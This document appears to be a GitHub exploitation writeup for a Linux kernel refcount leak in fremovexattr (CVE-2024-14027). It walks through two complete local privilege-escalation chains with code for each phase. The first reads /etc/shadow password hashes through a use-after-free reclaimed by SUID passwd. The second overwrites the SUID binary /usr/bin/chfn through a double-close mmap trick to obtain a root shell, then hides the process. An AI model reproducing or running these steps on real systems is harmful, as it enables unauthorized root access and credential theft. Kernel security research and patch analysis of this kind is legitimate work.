5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / WRITEUP.md MD
# CVE-2024-14027: Detailed Exploitation Writeup

## The Vulnerability

**Location**: `fs/xattr.c:952-976` (Linux 6.6.51 i386)

```c
SYSCALL_DEFINE2(fremovexattr, int, fd, const char __user *, name)
{
    struct fd f = fdget(fd);          // slow path: increments f_count
    char kname[XATTR_NAME_MAX + 1];
    int error = -EBADF;

    if (!f.file)
        return error;

    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;     // BUG: no fdput(f) — leaks one f_count reference

    // ... normal path calls fdput(f) at the end
    fdput(f);
    return error;
}
```

**Root cause**: Commit `c03185f4a23e` refactored `removexattr()` and moved `strncpy_from_user()` inline into `fremovexattr()`, but forgot to add `fdput(f)` on the early error return (line 966). Each call with an invalid `name` pointer leaks one refcount on the underlying `struct file`.

**Trigger**: Call `fremovexattr(fd, 0x1)` where `0x1` is an unmapped userspace address. `strncpy_from_user()` returns `-EFAULT`, the function returns early without calling `fdput()`. The fd table must be shared (via `clone(CLONE_FILES)`) so that `fdget()` takes the slow path and actually increments `f_count`.

---

## Exploitation Method 1: `/etc/shadow` Read (exploit.c)

### Concept
Overflow `f_count` to wrap it to 0, then free the `struct file` via normal close operations. The freed slab slot is reclaimed by a SUID process (`passwd -S`) that opens `/etc/shadow`. A dangling fd in the exploit process now points to the `/etc/shadow` `struct file` — read it.

### Step-by-step

#### Phase 1: Setup — pipes first, then target file
```
pipe() x4              → 8 struct files allocated from filp slab cache
open("/tmp/target")    → target struct file on CURRENT cpu_slab page
dup(target_fd)         → f_count = 2 (target_fd + dangling_fd)
```

**Why pipes first**: SLUB allocates from per-CPU freelists. By allocating pipe files first, the target file lands on whatever page is current after those allocations. No more filp allocs happen until the target is freed, so the cpu_slab stays the same → the freed slot goes to the per-CPU freelist → the next filp alloc (by passwd) reclaims it.

#### Phase 2: Shared fd table for slow-path fdget
```
clone(CLONE_VM | CLONE_FILES) → idle child shares fd table
```

**Why**: `fdget()` checks `atomic_long_read(&files->count)`. If count > 1 (shared fd table), it takes the slow path: `atomic_long_inc_not_zero(&file->f_count)`. If count == 1, it takes the fast path: just reads the pointer without touching f_count. We need the slow path during overflow so each `fremovexattr` actually increments f_count.

#### Phase 3: Refcount overflow
```
3 worker threads (clone CLONE_VM | CLONE_FILES):
  tight loop: fremovexattr(target_fd, 0x1) → each call leaks +1 to f_count

Starting f_count: 2
Target leaks: 0xFFFFFFFE (4,294,967,294)
Final f_count: 2 + 0xFFFFFFFE = 0x100000000 = 0 (mod 2^32)
```

**Arithmetic**: `atomic_long_t` on i386 is 32 bits. `atomic_long_inc` wraps at 2^32. After 0xFFFFFFFE leaks, f_count is exactly 0. This wrap happens via *increment*, not via `dec_and_test`, so `__fput` is never triggered — the struct file stays allocated but with f_count=0.

**Performance**: ~3.7-4.7M leaks/sec with 3 workers on KVM. Total time: ~22 minutes.

**Bulk + precise finish**: Workers run until within 10M of target, then stop. Main thread does remaining leaks single-threaded for precise count. If workers overshoot, a fixup loop wraps around again.

#### Phase 4: Enable fast-path fdget
```
kill(idle_child)  → files->count drops to 1
```

**Why**: With f_count=0, any future `fdget()` on this fd matters:
- **Slow path** (files->count > 1): calls `atomic_long_inc_not_zero(f_count)`. f_count=0 → returns NULL → EBADF. We can't use the fd at all.
- **Fast path** (files->count == 1): just reads `fd_table[fd]` directly without touching f_count. This lets us access the struct file even though f_count=0.

Killing the idle child drops `files->count` from 2 to 1, enabling fast-path fdget for all subsequent fd operations.

#### Phase 5: Fork spawner and closer BEFORE free
```
fork() → spawner child (inherits target_fd + dangling_fd)
fork() → closer child (inherits target_fd + dangling_fd)
```

**Critical detail**: `fork()` calls `dup_fd()` → `get_file()` on every inherited fd. `get_file()` does `atomic_long_inc()` — this is **unconditional** (not `inc_not_zero`). So fork bumps f_count from 0 to +2 per fork (once for target_fd, once for dangling_fd).

After 2 forks: f_count = 0 + 2 + 2 = 4

#### Phase 6: Free the struct file
```
closer child:  close(target_fd) → f_count 4→3
               close(dangling_fd) → f_count 3→2
parent:        close(target_fd) → f_count 2→1
spawner child: close(target_fd) → f_count 1→0 → dec_and_test SUCCEEDS → __fput → FREED
               close(dangling_fd) → another dec_and_test on freed slab (harmless)
```

**Key**: The spawner's close of target_fd does `dec_and_test(1→0)` = true → `__fput()` is called → struct file is freed via RCU callback → slab slot returns to SLUB freelist.

The parent keeps `dangling_fd` open. With fast-path fdget (files->count=1), any operation on `dangling_fd` reads the raw pointer from the fd table — pointing to freed/reused slab memory.

#### Phase 7: Spray via passwd -S
```
spawner child: continuous fork+execve("/usr/bin/passwd", "-S")
               each passwd opens /etc/shadow O_RDONLY → struct file allocated from filp slab
```

`passwd -S` is SUID root. When it runs, it opens `/etc/shadow` as root. The `struct file` for `/etc/shadow` is allocated from the same filp slab cache as the freed target — and lands in the freed slot (same CPU, same page, per-CPU freelist reuse).

#### Phase 8: Sacrificial child monitoring
```
for (;;) {
    child = fork();
    if (child == 0) {
        // In sacrificial child:
        flags = fcntl(dangling_fd, F_GETFL);  // fast-path: reads stale fd pointer
        if (flags == O_RDONLY) {               // shadow opened O_RDONLY
            fstat(dangling_fd, &sb);
            if (sb.st_dev == shadow_dev && sb.st_ino == shadow_ino) {
                pread(dangling_fd, buf, 64K, 0);  // READ /etc/shadow!
                write to /tmp/shadow_dump
                _exit(0);  // SUCCESS
            }
        }
    }
    waitpid(child);  // if child crashed (kernel oops), parent retries
}
```

**Sacrificial child pattern** (from CVE-2022-22942): The stale fd points to freed/reused slab memory. Operations on it may trigger kernel NULL dereferences (e.g., `f_path.mnt` is garbage, `path_init` dereferences it). If the child oopses, only the child dies — parent survives and forks another.

**dev/ino match**: Before the exploit, we `stat("/etc/shadow")` to get the device and inode. The child's `fstat()` on the stale fd compares against these to confirm it's truly /etc/shadow (not /etc/passwd or something else the SUID process opened).

**Result**: Parent receives child's exit(0) → success. /etc/shadow contents (yescrypt password hashes) printed to stdout and saved to `/tmp/shadow_dump`.

---

## Exploitation Method 2: SUID Binary Overwrite → Root Shell (exploit_dc.c)

### Concept
Same refcount overflow, but instead of reading a privileged file, we use a **double-close technique** to overwrite a SUID root binary (`/usr/bin/chfn`) with our own code, then exec it for a root shell.

The double-close technique chains two UAFs: first to create a writable mmap, then to redirect that mmap's backing file to a SUID binary.

### Step-by-step

#### Phases 1-4: Identical to exploit.c
Pipes first → open target → clone idle child → overflow f_count to 0 → kill idle child for fast-path fdget.

#### Phase 5: Free the struct file via fork helper

This is where exploit_dc.c differs from exploit.c. After overflow, f_count=0.

**The problem**: Simply calling `close(target_fd)` does `dec_and_test(0)`. But `dec_and_test` on atomic_long_t does: decrement to 0xFFFFFFFF, then test if result is 0. 0xFFFFFFFF ≠ 0, so `__fput` is never called. The struct file is never freed.

**The fix**: Fork a helper child:
```c
pid_t free_pid = fork();
if (free_pid == 0) {
    close(target_fd);     // f_count 2→1 (dec_and_test: 1≠0)
    close(dangling_fd);   // f_count 1→0 (dec_and_test: 0=0 → __fput → FREED!)
    _exit(0);
}
waitpid(free_pid, NULL, 0);
close(target_fd);  // parent cleanup (harmless fput on freed memory)
```

`fork()` calls `get_file()` with `atomic_long_inc` (unconditional) on every inherited fd. With f_count=0:
- target_fd: 0 → 1
- dangling_fd: 0 → 1 (same underlying struct file, so actually 1 → 2)
- Net: f_count = 0 + 2 = 2

Child closes both → `dec_and_test(2→1)` no, `dec_and_test(1→0)` yes → `__fput()` → struct file freed via RCU.

Parent still has `dangling_fd` open. With fast-path fdget (files->count=1), it can access the freed slab slot.

#### Phase 6: Spray temp files to reclaim the slot
```c
for (i = 0; i < 256; i++) {
    temp_fds[i] = open("/var/tmp/.xtmp_N", O_RDWR | O_CREAT | O_TRUNC, 0600);
    unlink(path);
    ftruncate(temp_fds[i], prog_size);
}
```

256 temp files opened O_RDWR. Each `open()` allocates a `struct file` from the filp slab cache. One of them reclaims the freed slot. The `dangling_fd` now points to a temp file's struct file.

#### Phase 7: Identify which temp file reclaimed the slot
```c
flags = fcntl(dangling_fd, F_GETFL);     // fast-path: reads through stale pointer
fstat(dangling_fd, &stale_sb);           // get inode of whatever's in the slot
for (i = 0; i < 256; i++) {
    fstat(temp_fds[i], &sb);
    if (sb.st_ino == stale_sb.st_ino && sb.st_dev == stale_sb.st_dev) {
        match_fd = temp_fds[i];          // FOUND IT
        break;
    }
}
```

**Retry loop**: If the slot was taken by a kernel-internal file (not our temp file), close everything, wait 200ms, and spray again. Up to 20 retries with `readlink(/proc/self/fd/N)` diagnostics.

#### Phase 8: Create writable mmap (but DON'T touch it yet)
```c
void *mmap_addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE,
                        MAP_SHARED, match_fd, 0);
// Close ALL temp fds — mmap holds the last reference
for (i = 0; i < 256; i++) close(temp_fds[i]);
```

**Critical**: `mmap()` checks `PROT_WRITE` against `match_fd`'s file mode (O_RDWR) — this check passes because it's our temp file. The kernel creates a VMA with `vm_file` pointing to the temp file's struct file. `vm_file` holds a reference (f_count=1 after closing all temp fds).

**Lazy pages**: We don't touch the mapping yet. Page faults are resolved lazily, via `vm_file->f_mapping`. We want the faults to happen *after* we swap the struct file underneath.

#### Phase 9: Double close (second free)
```c
close(dangling_fd);  // fput on temp file's struct file
                     // f_count was 1 (only mmap ref) → 0 → __fput → FREED AGAIN
usleep(200000);      // RCU grace period
```

This is the **double close**. `dangling_fd` still points to the same struct file as `match_fd` (the temp file). Closing it calls `fput()` → `dec_and_test(1→0)` → `__fput()` → struct file freed via RCU.

The mmap's VMA still has `vm_file` pointing to the now-freed struct file. This is the second dangling reference.

#### Phase 10: Reallocate with SUID target
```c
for (i = 0; i < 256; i++)
    suid_fds[i] = open("/usr/bin/chfn", O_RDONLY);
```

256 opens of the SUID binary. One of them reclaims the freed slab slot. The mmap's `vm_file` now points to `/usr/bin/chfn`'s struct file. Specifically, `vm_file->f_mapping` now points to chfn's inode address_space.

#### Phase 11: Overwrite via mmap
```c
memcpy(mmap_addr, prog_addr, prog_size);
```

`memcpy` triggers page faults on the mmap. The kernel resolves each fault via:
1. `vma->vm_file` → points to chfn's struct file (swapped!)
2. `file->f_mapping` → chfn's inode address_space
3. Page cache lookup in chfn's address_space
4. Write lands in chfn's page cache → **overwrites /usr/bin/chfn on disk**

**Key insight**: The `PROT_WRITE` check was done at `mmap()` time against the temp file (O_RDWR). The kernel doesn't re-verify write permission when the struct file underneath changes to an O_RDONLY file. The VMA flags say "writable" and that's what the page fault handler honors.

#### Phase 12: Exec for root shell
```c
// exploit_dc.c starts with:
if (!geteuid()) {
    setuid(0); setgid(0);
    execve("/bin/sh", ...);
}

// After overwrite:
execve("/usr/bin/chfn", ...);  // chfn is now our binary, SUID root → euid=0 → /bin/sh
```

The overwritten chfn is our exploit binary. When exec'd, it's SUID root, so `geteuid() == 0`. The entry check triggers: `setuid(0)`, `setgid(0)`, `execve("/bin/sh")` → **root shell**.

#### Phase 13: Become a ghost
```c
setsid();
close(0); close(1); close(2);
sigfillset(&set); sigprocmask(SIG_BLOCK, &set, NULL);
for (;;) pause();
```

The mmap still holds a dangling `vm_file`. If the process exits, the VFS tries to clean up and hits `f_count=0` → kernel warning "VFS: Close: file count is 0" or worse, an oops. So the process daemonizes and sleeps forever to avoid triggering cleanup.

---